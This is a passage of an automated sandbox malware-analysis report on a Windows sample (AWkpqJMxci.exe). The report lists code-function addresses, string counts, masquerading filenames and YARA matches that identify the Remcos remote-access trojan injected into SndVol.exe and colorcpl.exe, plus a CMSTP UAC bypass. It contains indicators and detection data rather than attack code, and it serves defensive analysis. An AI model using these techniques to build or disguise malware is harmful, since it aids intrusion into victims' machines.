                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B10BF010_2_00B10BF0
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B06B2010_2_00B06B20
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B1074010_2_00B10740
                  Source: C:\Users\Public\xpha.pifCode function: 11_2_00D11E2611_2_00D11E26
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: 16_2_028020C416_2_028020C4
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: 16_2_0280CA4F16_2_0280CA4F
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0043706A17_2_0043706A
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0041400517_2_00414005
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0043E11C17_2_0043E11C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_004541D917_2_004541D9
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_004381E817_2_004381E8
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0041F18B17_2_0041F18B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0044627017_2_00446270
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0043E34B17_2_0043E34B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_004533AB17_2_004533AB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0042742E17_2_0042742E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0043756617_2_00437566
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0043E5A817_2_0043E5A8
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_004387F017_2_004387F0
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0043797E17_2_0043797E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_004339D717_2_004339D7
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0044DA4917_2_0044DA49
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00427AD717_2_00427AD7
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0041DBF317_2_0041DBF3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00427C4017_2_00427C40
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00437DB317_2_00437DB3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00435EEB17_2_00435EEB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0043DEED17_2_0043DEED
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00426E9F17_2_00426E9F
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0516E76417_2_0516E764
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_051487F217_2_051487F2
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0515869917_2_05158699
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_051546F217_2_051546F2
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0514814917_2_05148149
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_051740C617_2_051740C6
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0515828117_2_05158281
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05134D2017_2_05134D20
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05156C0617_2_05156C06
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0515EC0817_2_0515EC08
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05158F0317_2_05158F03
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05166F8B17_2_05166F8B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0515EE3717_2_0515EE37
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0513E90E17_2_0513E90E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0514895B17_2_0514895B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05158ACE17_2_05158ACE
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0515950B17_2_0515950B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0515F06617_2_0515F066
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0515F2C317_2_0515F2C3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05157D8517_2_05157D85
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0513FEA617_2_0513FEA6
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05147BBA17_2_05147BBA
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0673551C appears 40 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04694E70 appears 54 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04661E65 appears 34 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 06702B80 appears 34 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 06735B8B appears 53 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04694801 appears 41 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04662093 appears 50 times
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: String function: 028046D4 appears 155 times
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: String function: 02804860 appears 683 times
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: String function: 0281894C appears 50 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 05155B8B appears 54 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 05122B80 appears 34 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00434801 appears 41 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00401E65 appears 34 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00434E70 appears 54 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 0515551C appears 40 times
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: String function: 028846D4 appears 244 times
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: String function: 02884860 appears 949 times
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: String function: 02884500 appears 33 times
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: String function: 028844DC appears 74 times
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: String function: 0289894C appears 56 times
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: String function: 028989D0 appears 45 times
                  Source: AWkpqJMxci.exeBinary or memory string: OriginalFilename vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exe, 00000000.00000003.1768938154.000000000E693000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exe, 00000000.00000003.1768938154.000000000E664000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exe, 00000000.00000003.1666597559.000000007FBBF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D605000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1805021411.000000007FB50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1782458415.00000000023DE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D5FA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D65F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
                  Source: AWkpqJMxci.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
